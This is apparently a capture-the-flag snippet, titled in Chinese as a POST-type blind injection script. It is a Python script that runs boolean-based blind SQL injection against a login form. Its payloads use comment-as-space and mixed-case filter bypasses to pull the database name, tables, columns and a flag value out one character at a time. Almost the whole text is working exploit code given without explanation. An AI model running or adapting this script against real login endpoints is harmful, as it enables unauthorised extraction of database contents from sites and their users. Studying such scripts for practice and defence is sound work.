盲注脚本
POST型
from time import sleep
import requests
s = requests.Session()
url = '******'
flag = ''
class Solution:
def function_database(self,left_num, compare_str_num):
payload = f"/**/or/**/ord(right(left((database()),{left_num}),1))={compare_str_num}#"
data = {
"name": '-1\'' + payload,
"pass": "1"
}
r = s.post(url, data=data)
if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
return True
else:
return False
def function_table(self,left_num, compare_str_num):
payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{left_num}),1))={compare_str_num}#"
data = {
"name": '-1\'' + payload,
"pass": "1"
}
r = s.post(url, data=data)
if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
return True
else:
return False
def function_column(self, left_num, compare_str_num):
payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='fl4g'),{left_num}),1))={compare_str_num}#"
data = {
"name": '-1\'' + payload,
"pass": "1"
}
r = s.post(url, data=data)
if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
return True
else:
return False
def function_content(self, left_num, compare_str_num):
payload = f"/**/or/**/ord(right(left((sELect/**/flag/**/from/**/fl4g),{left_num}),1))={compare_str_num}#"
data = {
"name": '-1\'' + payload,
"pass": "1"
}
r = s.post(url, data=data)
if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
return True
else:
return False
solve = Solution()
for left_num in range(1, 100):
low = 32
high = 127
for compare_str_num in range(low, high):
sleep(0.1)
if solve.function_content(left_num, compare_str_num):
flag += chr(compare_str_num)
print(flag)
break
print(flag)